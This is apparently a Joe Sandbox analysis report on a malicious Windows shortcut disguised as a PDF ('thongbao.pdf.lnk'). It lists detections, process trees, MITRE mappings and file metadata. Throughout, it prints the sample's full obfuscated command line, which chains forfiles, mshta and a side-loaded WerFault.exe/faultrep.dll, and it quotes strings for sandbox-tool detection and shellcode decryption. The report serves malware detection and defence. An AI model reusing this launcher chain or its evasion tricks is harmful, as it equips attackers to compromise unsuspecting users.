Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p3a3TSUccX.lnk

Overview

General Information

Sample name:p3a3TSUccX.lnk
renamed because original name is a hash value
Original sample name:6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60.lnk
Analysis ID:1500949
MD5:54f4610b378845315fb6dbae629cd97c
SHA1:59e38278a7f81438fe075789706a2b7e0b49184f
SHA256:6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60
Tags:lnk
Infos:

Detection

MalLnk
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
AI detected suspicious sample
Obfuscated command line found
Sigma detected: Suspicious Parent Double Extension File Execution
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6464 cmdline: "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe"))) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • forfiles.exe (PID: 6228 cmdline: forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
p3a3TSUccX.lnkJoeSecurity_MalLnkYara detected malicious lnkJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe"))), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6464, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6856, ProcessName: conhost.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe"))), CommandLine: "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe"))), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: p3a3TSUccX.lnkReversingLabs: Detection: 21%
    Source: p3a3TSUccX.lnkVirustotal: Detection: 34%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.0% probability
    Source: Binary string: C:\Users\user\NetHood\nts\My Music\bols\winload_prod.pdb\RX_INSTALL\_locales\pl\\\mp\che\pState\pps_{9a386491-5394-47a0-a408-e4e3a9d60139}\GQN2WC\e\v3\202914\S0\-47d0-8459-969652988747}\b-48ad6d679b24}\as_featuremanagement\-2dc7c298a033}\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WerFault.pdb source: p3a3TSUccX.lnk
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\W source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx6 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 09-53-40-267.log4 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\CHU-TUAN-KIET\source\doan\Loader2_DLL\Release\faultrep.pdb source: p3a3TSUccX.lnk
    Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*. source: forfiles.exe, 00000003.00000003.1258926347.000001951A571000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000003.00000003.1261729966.000001951A571000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A55C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WerFault.pdbGCTL source: p3a3TSUccX.lnk
    Source: p3a3TSUccX.lnkString found in binary or memory: (www.facebook.com/Thich.Hoc.Chui/)Tj equals www.facebook.com (Facebook)
    Source: p3a3TSUccX.lnkString found in binary or memory: /kTextE [/t (www.facebook.com/Thich.Hoc.Chui/)] equals www.facebook.com (Facebook)

    System Summary

    barindex
    Source: Yara matchFile source: p3a3TSUccX.lnk, type: SAMPLE
    Source: p3a3TSUccX.lnkLNK file: $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P %USERPROFILE% /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "%USERPROFILE%\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "%USERPROFILE%\IAMHERE.alf")) && m^s^h^t^a"."exe "%USERPROFILE%\IAMHERE.alf" && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (timeout 5 && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (exit) else (start /min "" "%APPDATA%\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "%APPDATA%\Lenovo\WerFault.exe")))
    Source: p3a3TSUccX.lnkBinary or memory string: OriginalFilenameWerFault.exej% vs p3a3TSUccX.lnk
    Source: p3a3TSUccX.lnkBinary string: o%XApplication Error%sInPageCoFireInPageError%s\system32\cofire.exe"%s" "%s" "%s"\Device\LanmanRedirector\%s :psapi.dllGetMappedFileNameWsfc_os.dllSfcIsFileProtectedFindFirstFileNameWFindNextFileNameWwdi.dll)n3Lgg
    Source: p3a3TSUccX.lnkBinary string: \\?\GLOBALROOT\Device\Mup\0000da39a3ee5e6b4b0d3255bfef95601890afd80709%04d/%02d/%02d:%02d:%02d:%02dU:!W:dc.xpmoddatadc.xpmodminidc.xpmodmemdc.OnDemandKdmpdc.expmoddatadc.expmodminidc.expmodmemdc.CustomDumpdc.xpminidumpdc.xpmemdumpdc.noreflectdc.forcenativedumpttd.tmpNoReflectionAbandoning reflection due to server requestAttempting to reflect reporting process!Reflection/ReserveMachineQueueDirectory attempt failed: 0X%XReflection attempt failed: 0X%XFalling back to non-reflected dump for reflection requestAttempting to cross-proc reporting process!Open process failed unexpectedly: 0X%XOut of cross process pid spaceelevatednon-elevatedfullReserveMachineQueueDirectory failed: 0x%xKernelDump failed: 0x%xCollectCrossProcessModuleDumps failed: 0x%xCollectCrossProcessDumps failed: 0x%xTTD recording not allowed: 0x%xControl Time Travel Debugging failed: 0x%xCould not collect xproc for reflection: 0x%x.dmpCould not collect dump for reflection cross process: 0x%xtruefalseCollectReflectionDump failed with: 0x%xCould not collect dump for cross process: 0x%xCould not collect cross dump for loaded module %ws: 0x%xFound %u native processes for xproc module: %sFound %u x86 processes for xproc module: %sTTD\
    Source: p3a3TSUccX.lnkBinary string: t\Device\IPTSYSTEM\CurrentControlSet\Control\WMI\Autologger\Microsoft-OCA-IPTBufferSize{C712AF3D-ED1E-46A9-B843-E9014D29CAEE}LogFileModeMinimumBuffersEnableKernelFlagsStatusStartapi-ms-win-eventing-controller-l1-1-0.dllStartTraceWMicrosoft-OCA-IPTWIN://SYSAPPIDonecore\shell\lib\calleridentity\calleridentity.cppN%\
    Source: classification engineClassification label: mal84.troj.evad.winLNK@4/0@0/0
    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: p3a3TSUccX.lnkReversingLabs: Detection: 21%
    Source: p3a3TSUccX.lnkVirustotal: Detection: 34%
    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf""Jump to behavior
    Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
    Source: Binary string: C:\Users\user\NetHood\nts\My Music\bols\winload_prod.pdb\RX_INSTALL\_locales\pl\\\mp\che\pState\pps_{9a386491-5394-47a0-a408-e4e3a9d60139}\GQN2WC\e\v3\202914\S0\-47d0-8459-969652988747}\b-48ad6d679b24}\as_featuremanagement\-2dc7c298a033}\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WerFault.pdb source: p3a3TSUccX.lnk
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\W source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx6 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 09-53-40-267.log4 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\CHU-TUAN-KIET\source\doan\Loader2_DLL\Release\faultrep.pdb source: p3a3TSUccX.lnk
    Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*. source: forfiles.exe, 00000003.00000003.1258926347.000001951A571000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000003.00000003.1261729966.000001951A571000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A55C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WerFault.pdbGCTL source: p3a3TSUccX.lnk

    Data Obfuscation

    barindex
    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))

    Persistence and Installation Behavior

    barindex
    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe

    Malware Analysis System Evasion

    barindex
    Source: p3a3TSUccX.lnkBinary or memory string: INFOWERPINITIATECRASHREPORTING WAS MEOMEO!AESCHAININGMODECBCCHAININGMODEOBJECTLENGTHTCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXECONFIRMEDCHECK SIZE: %LU BYTESMY_PAYLOAD_LENERRORFAILED TO ALLOCATE MEMORYFAILED TO SET MEMORY PROTECTION[-] SANDBOX PROCESS DETECTED![+] DECRYPTING SC...
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf""Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" $r$u$n$d$l$l$3$2 $s$he$ll$3$2$.dll $$s$h$e$l$l$e$x$e$c_r$un$d$l$l "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /p c:\users\user /s /m "thongbao.pdf.lnk" /c "cmd /c copy "@path" "c:\users\user\iamhere.alf"") else (copy "%cd%\thongbao.pdf.lnk" "c:\users\user\iamhere.alf")) && m^s^h^t^a"."exe "c:\users\user\iamhere.alf" && (if not exist "c:\users\user\appdata\roaming\lenovo\faultrep.dll" (timeout 5 && (if not exist "c:\users\user\appdata\roaming\lenovo\faultrep.dll" (exit) else (start /min "" "c:\users\user\appdata\roaming\lenovo\werfault.exe")))else (timeout 1 && start /min "" "c:\users\user\appdata\roaming\lenovo\werfault.exe")))
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    11
    Process Injection
    11
    Process Injection
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    DLL Side-Loading
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
    System Information Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1500949 Sample: p3a3TSUccX.lnk Startdate: 29/08/2024 Architecture: WINDOWS Score: 84 12 Windows shortcut file (LNK) starts blacklisted processes 2->12 14 Multi AV Scanner detection for submitted file 2->14 16 Yara detected malicious lnk 2->16 18 5 other signatures 2->18 6 cmd.exe 1 2->6         started        process3 process4 8 forfiles.exe 1 6->8         started        10 conhost.exe 1 6->10         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    p3a3TSUccX.lnk21%ReversingLabsWin32.Trojan.Pantera
    p3a3TSUccX.lnk35%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    No contacted IP infos
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1500949
    Start date and time:2024-08-29 06:58:08 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 3m 47s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:22
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:p3a3TSUccX.lnk
    renamed because original name is a hash value
    Original Sample Name:6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60.lnk
    Detection:MAL
    Classification:mal84.troj.evad.winLNK@4/0@0/0
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .lnk
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
    • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
    No simulations
    No context
    No context
    No context
    No context
    No context
    No created / dropped files found
    File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=13, ctime=Sat Aug 17 17:28:53 2024, mtime=Sat Aug 17 17:28:53 2024, atime=Sat Aug 17 17:28:53 2024, length=0, window=hide
    Entropy (8bit):7.287843928765531
    TrID:
    • Windows Shortcut (20020/1) 59.73%
    • Visual Basic Script (13500/0) 40.27%
    File name:p3a3TSUccX.lnk
    File size:879'742 bytes
    MD5:54f4610b378845315fb6dbae629cd97c
    SHA1:59e38278a7f81438fe075789706a2b7e0b49184f
    SHA256:6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60
    SHA512:9a1c87d34f6a887d6f88527b99cbb9c4998fed94183b3f7d5491b7770d1d9421233767b8f22a82923775f8512be4f50a095c14e63821d0a5477151fb6117cf31
    SSDEEP:24576:1Dz7X3+2ZnJBoCk0EDOTvpEcyhJC1QS1jhxJp+7o:1Dm2ZJBoNhDOTvq7XS1jf2M
    TLSH:1E15B012F6E884F1F6B343315A7DB2216A3A74657EF064C72294669F9AF02C09F3471B
    File Content Preview:L..................F...........O.......O.......O.................................P.O. .:i.....+00.../C:\...................<.1..p...Y.*..windows.&........Ol..Y......w.i.n.d.o.w.s.....@.1......Y`...System32..(........Ol..Y......S.y.s.t.e.m.3.2.....<.2..l..
    Icon Hash:74f4f4dcece9e9ed

    General

    Relative Path:
    Command Line Argument:$r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P %USERPROFILE% /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "%USERPROFILE%\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "%USERPROFILE%\IAMHERE.alf")) && m^s^h^t^a"."exe "%USERPROFILE%\IAMHERE.alf" && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (timeout 5 && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (exit) else (start /min "" "%APPDATA%\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "%APPDATA%\Lenovo\WerFault.exe")))
    Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    No network behavior found

    Click to jump to process

    Click to jump to process

    Click to jump to process

    Target ID:0
    Start time:00:59:01
    Start date:29/08/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))
    Imagebase:0x7ff721780000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
